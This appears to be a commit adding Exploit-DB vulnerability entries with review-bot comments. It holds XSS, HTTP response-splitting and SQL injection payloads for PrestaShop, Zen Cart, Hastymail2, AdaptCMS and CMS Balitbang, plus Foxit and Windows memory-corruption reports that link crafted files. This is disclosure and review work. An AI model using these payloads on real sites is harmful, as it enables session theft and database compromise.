GET: http://<app_base>/modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php
POST: num_mode=<script>alert(&#039;XSS&#039;)</script>
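Review bot: The payload line keeps HTML entities (&#039;) copied from the SecurityFocus page instead of the literal quote characters, so the file does not record the actual request body; decode the entities when importing. The same residue appears in the other PrestaShop, Zen Cart and Hastymail2 files added in this commit.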

platforms/php/webapps/36342.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50784/info
PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/modules/mondialrelay/googlemap.php?relativ_base_dir=>&#039;);alert(&#039;XSS&#039;);
http://www.example.com/modules/mondialrelay/googlemap.php?relativ_base_dir=">&#039;);alert(&#039;XSS&#039;);
http://<app_base>/modules/mondialrelay/googlemap.php?Pays=&#039;);alert(&#039;XSS&#039;);

platforms/php/webapps/36343.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50784/info
PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected.
GET: http://<app_base>/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php
POST: Expedition=<script>alert(&#039;XSS&#039;)</script>

platforms/php/webapps/36344.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50784/info
PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected.
GET: http://<app_base>/admin/ajaxfilemanager/ajax_save_text.php
POST: folder=<script>alert(&#039;XSS 1&#039;);</script>&name=<script>alert(&#039;XSS 2&#039;);</script>

platforms/php/webapps/36345.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50785/info
Prestashop is prone to an HTTP-response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid various attacks that try to entice client users into a false sense of trust.
Prestashop 1 4.4.1 is vulnerable; other versions may also be affected.
GET: http://www.example.com/admin/displayImage.php?img=<name_of_existing_file_in_md5_format>&name=asa.cmd"%0d%0a%0d%0a@echo off%0d%0aecho running batch file%0d%0apause%0d%0aexit
Note: The <name_of_existing_file_in_md5_format> is the name of one file existing on the "upload/" folder. It&#039;s name must be a MD5 hash, without any extension. ex: "435ed7e9f07f740abf511a62c00eef6e"
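Review bot: "Prestashop 1 4.4.1" in the version line is missing a dot; the CSV row for 36345 reads 1.4.4.1. In the note, "It&#039;s name" should be "Its name", and the entity is another instance of undecoded HTML from the source page.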

platforms/php/webapps/36346.txt Executable file
@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/50787/info
Zen Cart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Zen Cart 1.3.9h is vulnerable; other versions may also be affected.
GET: https://www.example.com/index.php?main_page=gv_send&action=send
POST: message=&lt;/textarea&gt;<script>alert("XSS");</script><textarea>
line 72: echo &#039;<br /><strong>TESTING INFO:</strong> Time page: <strong>&#039; . $_GET[&#039;main_page&#039;] . &#039;</strong> was loaded is: <strong>&#039; . date(&#039;H:i:s&#039;, time()) . &#039;</strong><br /><br />&#039;;
...
line 75: echo "GLOBALS[$main_page] and HTTP_GET_VARS[&#039;main_page&#039;] and _GET[&#039;main_page&#039;] = " . $GLOBALS[&#039;main_page&#039;] . &#039; - &#039; . $HTTP_GET_VARS[&#039;main_page&#039;] . &#039; - &#039; . $_GET[&#039;main_page&#039;] . &#039;<br /><br />&#039;;
...
line 76: echo "_SERVER[&#039;PHP_SELF&#039;] and _GET[&#039;PHP_SELF&#039;] and PHP_SELF and _SESSION[&#039;PHP_SELF&#039;] = " . $_SERVER[&#039;PHP_SELF&#039;] . &#039; - &#039; . $_GET[&#039;PHP_SELF&#039;] . &#039; - &#039; . $PHP_SELF . &#039; - &#039; . $_SESSION[&#039;PHP_SELF&#039;] . &#039;<br /><br />&#039;;
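Review bot: the quoted lines 72, 75 and 76 echo `$_GET['main_page']`, `$_GET['PHP_SELF']` and `$_SERVER['PHP_SELF']` unescaped, but the entry never names the file they come from, gives no request that reaches them, and does not say whether that `TESTING INFO` output is gated by a debug setting; as it stands only the `gv_send` textarea case is reproducible. Add the file path and a GET PoC for the `main_page` / `PHP_SELF` reflection, or drop the quoted lines. The POST payload is also shown half entity-encoded (`&lt;/textarea&gt;`) and half literal; it should be one literal string, `message=</textarea><script>alert("XSS");</script><textarea>`, and the entry should state whether the gift-voucher send form requires a logged-in customer session.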

platforms/php/webapps/36347.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50789/info
Hastymail2 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Hastymail2 2.1.1 is vulnerable; other versions may also be affected.
GET: http://<app_base>/index.php?page=mailbox&mailbox=Drafts
POST: rs=<script>alert(&#039;xss&#039;)</script>
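Review bot: the PoC pairs a GET URL (`index.php?page=mailbox&mailbox=Drafts`) with a POST body `rs=<script>alert('xss')</script>` without saying how the two combine, what `rs` is, or where in the response it is reflected; a mailbox view would also normally sit behind a login, which the entry does not mention. Spell out the method (POST to that URL with that body), whether a valid session is required, and the reflecting context, so the issue can be verified against 2.1.1 and a fix can be checked.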

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50794/info
Pro Clan Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pro Clan Manager 0.4.2 is vulnerable; other versions may also be affected.
notarealuser%00'+union+select+1;#
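Review bot: `notarealuser%00'+union+select+1;#` is a bare payload with no URL, script name, parameter or HTTP method, so the injection point cannot be located and the entry is not reproducible; add the request it belongs in (the `notarealuser` prefix suggests a username field, but that should be stated rather than guessed) and explain what the `%00` achieves, i.e. which check it is meant to truncate before the quote reaches the query. The header above this hunk also lacks the path line the neighbouring entries carry, so the file this text lands in is not visible here.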

platforms/php/webapps/36349.txt Executable file
@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/50795/info
AdaptCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.0 and 2.0.1 are vulnerable; other versions may also be affected.
http://www.example.com/article/'66/Blog/AdaptCMS-20-March-26th
http://www.example.com/article/'75/News/AdaptCMS-200-Released
http://www.example.com/article/'293/Album/Pink-Floyd-Animals
http://www.example.com/article/'294/News/AdaptCMS-202-Update
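Review bot: the four URLs are the same test, a single quote prefixed to the numeric article id in `/article/'<id>/<category>/<slug>`, repeated against four different articles; one URL plus the error the application returns would say as much, and a true/false or time-based comparison on the id would show it is used in a query rather than merely producing a syntax error. The entry also does not say which component parses the article route, so there is nothing to check the 2.0.0/2.0.1 claim or a later fix against.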

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50797/info
CMS Balitbang is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/<CMS Balitbang Installation Path>/index.php?id=lih_buku&hal='[SQL]
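Review bot: `hal='[SQL]` marks the injection point but gives no concrete payload, no hint of what `hal` or `id=lih_buku` control, and no response that distinguishes a successful injection from a generic error; replace `[SQL]` with one working value and the observable result. This file and the next share BID 50797 and identical description text; they would read better as one entry listing both URLs, or at least as explicit cross-references.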

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50797/info
CMS Balitbang is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/<CMS Balitbang Installation Path>/alumni.php?id=data&tahun&hal='[SQL]
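Review bot: in `alumni.php?id=data&tahun&hal='[SQL]` the `tahun` parameter has no value (no `=`), which looks like a truncation and should be checked against the BID 50797 report before this is published; as with the `index.php` entry, `[SQL]` should be a concrete payload with the expected response, and the two Balitbang files should point at each other.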

platforms/windows/dos/36334.txt Executable file
@ -0,0 +1,69 @@
#####################################################################################
Application: Foxit Products GIF Conversion Memory Corruption Vulnerabilities (LZWMinimumCodeSize)
Platforms: Windows
Versions: The vulnerability is confirmed in version Foxit Reader 7.x. Other versions may also be affected.
Secunia: SA63346
{PRL}: 2015-01
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
(http://en.wikipedia.org/wiki/Foxit_Reader)
#####################################################################################
============================
2) Report Timeline
============================
2015-02-17: Francis Provencher from Protek Research Labs found the issue;
2015-02-21: Foxit Security Response Team confirmed the issue;
2015-02-21: Foxit fixed the issue;
2015-03-09: Foxit released fixed version of Foxit Reader 7.1/Foxit Enterprise Reader 7.1/Foxit PhantomPDF7.1.
#####################################################################################
============================
3) Technical details
============================
An error when handling LZWMinimumCodeSize can be exploited to cause memory corruption via a specially crafted GIF file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-01.gif
http://www.exploit-db.com/sploits/36334.gif
###############################################################################
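Review bot: section 3 is a single sentence and does not say which `LZWMinimumCodeSize` value triggers the corruption, what the crash looks like (faulting module, access type) or which Foxit component performs the GIF conversion, so the issue cannot be triaged against the 7.1 fix from this text alone; the PoC is two external URLs with no hash, so a SHA-256 for `36334.gif` should be recorded in the entry. `Versions: ... Foxit Reader 7.x` is too broad given that the timeline names 7.1 as the fixed release; state the affected range as below 7.1. The introduction is pasted from Wikipedia with its `[3]`, `[citation needed]` and the run-together `toAdobe` left in.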

platforms/windows/dos/36335.txt Executable file
@ -0,0 +1,68 @@
#####################################################################################
Application: Foxit Products GIF Conversion Memory Corruption Vulnerabilities (DataSubBlock)
Platforms: Windows
Versions: The vulnerability is confirmed in version Foxit Reader 7.x. Other versions may also be affected.
Secunia: SA63346
{PRL}: 2015-02
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
(http://en.wikipedia.org/wiki/Foxit_Reader)
#####################################################################################
============================
2) Report Timeline
============================
2015-01-22: Francis Provencher from Protek Research Labs found the issue;
2015-01-28: Foxit Security Response Team confirmed the issue;
2015-01-28: Foxit fixed the issue;
2015-03-09: Foxit released fixed version of Foxit Reader 7.1/Foxit Enterprise Reader 7.1/Foxit PhantomPDF7.1.
#####################################################################################
============================
3) Technical details
============================
An error when handling the Size member of a GIF DataSubBlock data structure can be exploited to cause memory corruption via a specially crafted GIF file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-02.gif
http://www.exploit-db.com/sploits/36335.gif
###############################################################################
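Review bot: as with the `LZWMinimumCodeSize` entry, section 3 gives no specifics. A GIF DataSubBlock is a one-byte Size followed by that many bytes, so the note should at least say whether the crafted Size exceeds the data remaining in the block or in the file and where the reader faults. Both files cite Secunia SA63346 and the same 7.1 fixed release and should cross-reference each other, `Versions: ... 7.x` should become the range below 7.1, a SHA-256 for `36335.gif` should be recorded, and the Wikipedia-pasted introduction with its footnote markers should be trimmed.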

platforms/windows/dos/36336.txt Executable file
@ -0,0 +1,73 @@
#####################################################################################
Application: Microsoft Windows Text Services memory corruption.
Platforms: Windows
Versions: list.
Microsoft: MS15-020
Secunia: SA63220
{PRL}: 2015-03
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Microsoft Corporation is an American multinational corporation headquartered in Redmond, Washington, that develops, manufactures, licenses, supports and sells computer software, consumer electronics and personal computers and services. Its best known software products are the Microsoft Windowsline of operating systems, Microsoft Office office suite, and Internet Explorer web browser. Its flagship hardware products are the Xbox game consoles and the Microsoft Surface tablet lineup. It is the worlds largest software maker measured by revenues.[5]It is also one of the worlds most valuable companies.[6]
(http://en.wikipedia.org/wiki/Microsoft)
#####################################################################################
============================
2) Report Timeline
============================
2015-02-08: Francis Provencher from Protek Research Labs found the issue;
2015-03-04: MSRC confirmed the issue;
2015-03-10: Microsoft fixed the issue;
2015-03-10: Microsoft release a Patch for this issue.
#####################################################################################
============================
3) Technical details
============================
An unspecified error in Windows Text Services can be exploited to cause memory corruption..
#####################################################################################
===========
4) POC
===========
This file need to be open in wordpad.
http://protekresearchlab.com/exploits/PRL-2015-03.rar
http://www.exploit-db.com/sploits/36336.rar
###############################################################################
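Review bot: `Versions: list.` is an unfilled placeholder; either enumerate the affected Windows releases or refer the reader to the MS15-020 bulletin's affected-software table. Section 3 says only "unspecified error" (with a doubled period), so nothing here lets a reader connect the `.rar` PoC to a particular issue in that bulletin; the file type inside the archive and the faulting module when it is opened in WordPad would help, and `This file need to be open in wordpad` should read `This file needs to be opened in WordPad`. The timeline records "fixed" and "release a Patch" on the same day, 2015-03-10, so one of the two lines is redundant, and the introduction describing Microsoft as a corporation says nothing about Windows Text Services.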